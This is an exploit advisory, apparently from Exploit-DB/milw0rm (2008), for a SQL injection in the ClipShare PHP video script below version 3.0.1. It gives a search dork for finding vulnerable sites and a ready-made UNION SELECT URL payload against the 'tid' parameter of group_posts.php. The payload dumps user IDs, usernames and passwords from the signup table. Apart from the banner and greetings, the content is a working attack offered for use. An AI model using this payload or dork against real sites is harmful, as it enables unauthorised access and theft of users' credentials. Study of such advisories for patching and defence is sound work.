ClipShare < 3.0.1 - 'tid' SQL Injection

EDB-ID:

5839


Platform:

PHP

Published:

2008-06-17

             /************************************************************************/
             /*                                                                      */
             /*                             Clipshare                                */
             /*                                                                      */
             /*                  Remote SQL Injection Vulnerability                  */
             /*                                                                      */
             /*                                                                      */
             /************************************************************************/

 [~]AUTHOR   : SuNHouSe2 [ALGERIAN HaCkEr]

 [~]DORK     : "powered by clipshare"

 [~]VERSION  : less than v3.0.1

 [~]EXPLOIT  : 

             http://localhost/group_posts.php?urlkey=1&gid=1&tid=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a3a,uid,username,pwd),6,7+from+signup+limit+0,20/*


          
             ///////////////////////////////////////////////////////////////////////////////////

             ///////    Special ThanX : His0k4 , TrYaG TeAm , & ALL Muslims HaCkErs..../////////

            ///////////////////////////////////////////////////////////////////////////////////
                                        
                                    -=-=-=-= SuNHouSe2@yahoo.com =-=-=-

# milw0rm.com [2008-06-17]